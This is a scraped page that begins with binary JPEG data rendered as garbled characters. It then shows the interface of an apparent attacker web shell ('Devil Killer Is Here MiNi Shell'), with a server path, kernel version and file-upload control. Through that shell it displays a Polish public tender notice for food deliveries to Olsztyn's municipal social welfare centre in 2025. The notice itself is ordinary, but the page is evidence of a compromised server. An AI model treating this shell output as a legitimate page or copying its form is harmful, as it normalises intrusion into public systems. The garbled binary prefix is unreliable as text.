JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241217/0065710801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa artykułów spożywczych na potrzeby jednostek organizacyjnych Miejskiego Ośrodka Pomocy Społecznej na terenie miasta Olsztyna w 2025 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Ośrodek Pomocy Społecznej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 004447867</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Marsz. J. Piłsudskiego 61a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Olsztyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">10-449</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@mops.olszty.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://mopsolsztyn.bip.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa artykułów spożywczych na potrzeby jednostek organizacyjnych Miejskiego Ośrodka Pomocy Społecznej na terenie miasta Olsztyna w 2025 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-31543211-8666-4fcf-a846-155dfd7458b3</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00657108</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00044920/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa artykułów żywnościowych dla jednostek organizacyjnych MOPS w Olsztynie 2025 roku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.olsztyn.eu <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.olsztyn.eu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W przedmiotowym postępowaniu komunikacja pomiędzy Zamawiającym a Wykonawcami w odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy Zamówień Publicznych Gminy Olsztyn dostępnej pod adresem https://zamowienia.olsztyn.eu.<br/>Zamawiający dopuszcza również możliwość porozumiewania się za pomocą e-mail przy przekazywaniu pytań, wniosków o wyjaśnienie treści SWZ, zawiadomień, informacji dotyczących postępowania, pod adresem solminska.paulina@mops.olsztyn.eu przy czym złożenie oferty wraz z załączonymi do oferty dokumentami może nastąpić wyłącznie za pośrednictwem Platformy Zamówień Publicznych Gminy Olsztyn https://zamowienia.olsztyn.eu.<br/>2.Korzystanie z platformy jest bezpłatne, aby korzystać z usług Platformy Zamówień Publicznych Gminy Olsztyn Wykonawca powinien utworzyć konto użytkownika.<br/>3.Instrukcja dla Wykonawcy oraz regulamin korzystania z systemu Platforma Zamówień Publicznych Gminy Olsztyn zamieszczone zostały w zakładce „Pomoc”. Przystępując do postępowania o udzielenie zamówienia publicznego, Wykonawca oświadcza, że zapoznał się z regulaminem korzystania z systemu oraz instrukcją użytkownika systemu Platforma Zamówień Publicznych Gminy Olsztyn.<br/>4.Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, które muszą spełniać urządzenia informatyczne w celu korzystania z Platformy zakupowej:<br/>1)Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHz, jeden z systemów operacyjnych - MS Windows 10 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>3)Zainstalowana dowolna przeglądarka internetowa najlepiej najnowszej dostępnej wersji obsługująca TLS 1.2 z wyjątkiem Internet Explorer;<br/>4)Włączona obsługa JavaScript;<br/>5)Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie *.pdf.;<br/>6)Podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez wystawcę certyfikatu używanego przez Użytkownika lub aplikacja komputerowa spełniająca funkcje takiego czytnika (tzw. podpis chmurowy).<br/>5. Informacje na temat specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych:<br/>1) Dopuszczalne formaty przesyłanych danych, tj. plików o wielkości do 100 MB w formatach: doc, .pdf, .zip, .docx, .xls, .xlsx, .rar, .7zip, .jpg, .jpeg, .png, .txt, .tiff, .xades, .sig<br/><br/>2) Format kodowania złożonych plików UTF8. Możliwość otworzenia pliku po odszyfrowaniu przez terminu składania ofert.<br/>6.Za datę przekazania oferty przyjmuje się datę złożenia kompletu dokumentów w systemie Platformy Zamówień Publicznych Gminy Olsztyn.<br/>7.Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego posiadający konto na Platformy Zamówień Publicznych Gminy Olsztyn ma dostęp do formularzy: złożenia, zmiany, wycofania oferty oraz do formularza do komunikacji.<br/>8. Wymaga się by dokumenty elektroniczne w postępowaniu:<br/>1)były utrwalone w sposób umożliwiający ich wielokrotne odczytywanie i powielanie, a także przekazanie przy użyciu środków komunikacji elektronicznej lub na informatycznym nośniku danych;<br/>2) umożliwiały prezentację treści w postaci elektronicznej, w szczególności przez wyświetlenie tej treści na monitorze ekranowym.<br/>3) umożliwiały prezentację treści w postaci papierowej, w szczególności za pomocą wydruku<br/>4)zawierały dane w układzie niepozostawiającym wątpliwości, co do treści i kontekstu zapisanych informacji.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (DZ.U. UE L119 z dnia 4 maja 2016 r., zwanym dalej &#34;RODO&#34;) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest: Miejski Ośrodek Pomocy Społecznej w Olsztynie, al. Marsz. J. Piłsudskiego 61 A, 10-449 Olsztyn posiadający REGON: 004447867, NIP: 7391151579, e-mail: biuro@mops.olsztyn.eu<br/>2) administrator wyznaczył inspektora danych osobowych, z którym można się kontaktować pod adresem e-mail: iodo@mops.olsztyn.eu<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, w którym udostępniona zostanie dokumentacja postępowania w oparciu o art 74 ustawy Pzp.<br/>5) Pani/Pan dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. <br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczący (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmierne dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą w wyniku postępowania o udzielenie zamówienia publicznego ani znaną ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem zakresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, w których mowa o art. 18 ust. 2RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); <br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/ Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu: <br/>a) w związku z artykułem 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych <br/>b) prawo do przeniesienia danych osobowych, o których mowa w artykule 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych lub Stawki 2, 00 – 193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MOPS.DZPiI.261.38.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 392302,38 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W części I – artykuły spożywcze różne Zamawiający wymaga, aby:<br/>a) dostarczane artykuły spożywcze były wysokiej jakości i posiadały termin przydatności do spożycia maksymalny dla danego produktu,<br/>b) artykuły spożywcze były dostarczane w opakowaniach detalicznych,<br/>c) każdy artykuł był oznakowany w języku polskim, zawierał co najmniej: nazwę, pod którą został wprowadzony do obrotu, nazwę producenta, ilość produktu w opakowaniu, datę produkcji, datę przydatności do spożycia, warunki przechowywania,<br/>d) opakowania artykułów – słoiki szklane, torebki papierowe, kartony, torby foliowe były oznakowane etykietą zawierająca rzetelne informacje o produkcie, były czyste, bez oznak zawilgocenia, zapleśnienia, obecności szkodników, całe i szczelne,<br/>e) smak i zapach oferowanych produktów były charakterystyczne dla danego artykułu spożywczego bez obcych posmaków czy zapachów,<br/>f) warunki podczas transportu były zgodne z zasadami GMP/GHP.<br/>Szczegółowy opis przedmiotu zamówienia i zakres został określony w formularzu cenowym stanowiącym załącznik nr 1A do formularza oferty. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 93099,40 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15600000-4 - Produkty przemiału ziarna, skrobi i produktów skrobiowych</p> <p class="mb-0">15400000-2 - Oleje i tłuszcze zwierzęce lub roślinne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 441 ustawy Pzp, które będzie polegało na zwiększeniu wartości zamówienia w wysokości 20% wartości zamówienia podstawowego w razie osiągnięcia limitu wynagrodzenia wynikającego z umowy przed upływem terminu na jaki została zawarta umowa. Opcja, o której mowa powyżej, będzie realizowana wg następujących zasad:<br/>1) Zamawiający dopuszcza możliwość skorzystania z prawa opcji po wcześniejszym wykorzystaniu limitu środków wynikających z umowy w danej części zamówienia przed upływem terminu na jaki została zawarta umowa, w przypadku gdy będzie dysponował środkami finansowymi na zachowanie ciągłości realizacji zadania <br/>2) Cena jednostkowa dla poszczególnych artykułów na dzień uruchomienia prawa opcji będzie zgodna z ceną wynikającą z umowy, <br/>3) Zamawiający może z prawa opcji skorzystać w części lub w pełnym zakresie. Wykonawca jest zobowiązany do realizacji umowy w zakresie, w jakim Zamawiający z prawa opcji skorzysta, przy czym ilość zamawianych artykułów w ramach opcji nie przewyższy 20% wartości zamówienia podstawowego,<br/>4) Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego <br/>i nie ma charakteru zobowiązania, dlatego też nieskorzystanie przez Zamawiającego z prawa opcji nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego,<br/>5) Zamówienie objęte prawem opcji Wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu pisemnego zawiadomienia od Zamawiającego, że zamierza skorzystać z prawa opcji, zawierającego informację o wysokości wartości zamówienia w ramach przedmiotowego uprawnienia zamawiającego,<br/>6) Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które obowiązywać będą przy realizacji zamówienia podstawowego, <br/>7) Zamawiający z prawa opcji może skorzystać kilkukrotnie, niezłożenie zlecenia przez Zamawiającego do 15.12.2025 r. oznacza rezygnację z prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty, Zamawiający będzie się kierował kryterium ceny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W części II - nabiał (mleko i przetwory mleczarskie) Zamawiający wymaga, aby:<br/>a) dostarczane artykuły spożywcze były wysokiej jakości bez zanieczyszczeń mikrobiologicznych i bakterii chorobotwórczych,<br/>b) mleko i przetwory mleczarskie pochodziły z bieżącej produkcji, posiadały termin przydatności do spożycia w chwili dostawy nie krótszy niż 5 dni przed jego upływem,<br/>c) artykuły były dostarczane w opakowaniach detalicznych o gramaturze nie niższej niż przewidziana w załączniku nr 1B do formularza oferty,<br/>d) każdy artykuł był oznakowany w języku polskim, zawierał co najmniej: nazwą, pod którą został wprowadzony do obrotu, adres producenta, ilość produktu w opakowaniu, datę produkcji, datę przydatności do spożycia, warunki przechowywania,<br/>e) warunki podczas transportu były zgodne z zasadami GMP/GHP.<br/>Szczegółowy opis przedmiotu zamówienia i zakres został określony w formularzu cenowym stanowiącym załącznik nr 1B do formularza oferty. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 61224,51 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15540000-5 - Produkty serowarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje możliwość skorzystania z prawa opcji, o którym mowa w art. 441 ustawy Pzp, które będzie polegało na zwiększeniu wartości zamówienia w wysokości 20% wartości zamówienia podstawowego w razie osiągnięcia limitu wynagrodzenia wynikającego z umowy przed upływem terminu na jaki została zawarta umowa. Opcja, o której mowa powyżej, będzie realizowana wg następujących zasad:<br/>1) Zamawiający dopuszcza możliwość skorzystania z prawa opcji po wcześniejszym wykorzystaniu limitu środków wynikających z umowy w danej części zamówienia przed upływem terminu na jaki została zawarta umowa, w przypadku gdy będzie dysponował środkami finansowymi na zachowanie ciągłości realizacji zadania <br/>2) Cena jednostkowa dla poszczególnych artykułów na dzień uruchomienia prawa opcji będzie zgodna z ceną wynikającą z umowy, <br/>3) Zamawiający może z prawa opcji skorzystać w części lub w pełnym zakresie. Wykonawca jest zobowiązany do realizacji umowy w zakresie, w jakim Zamawiający z prawa opcji skorzysta, przy czym ilość zamawianych artykułów w ramach opcji nie przewyższy 20% wartości zamówienia podstawowego,<br/>4) Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego <br/>i nie ma charakteru zobowiązania, dlatego też nieskorzystanie przez Zamawiającego z prawa opcji nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego,<br/>5) Zamówienie objęte prawem opcji Wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu pisemnego zawiadomienia od Zamawiającego, że zamierza skorzystać z prawa opcji, zawierającego informację o wysokości wartości zamówienia w ramach przedmiotowego uprawnienia zamawiającego,<br/>6) Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które obowiązywać będą przy realizacji zamówienia podstawowego, <br/>7) Zamawiający z prawa opcji może skorzystać kilkukrotnie, niezłożenie zlecenia przez Zamawiającego do 15.12.2025 r. oznacza rezygnację z prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty, Zamawiający będzie się kierował kryterium ceny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 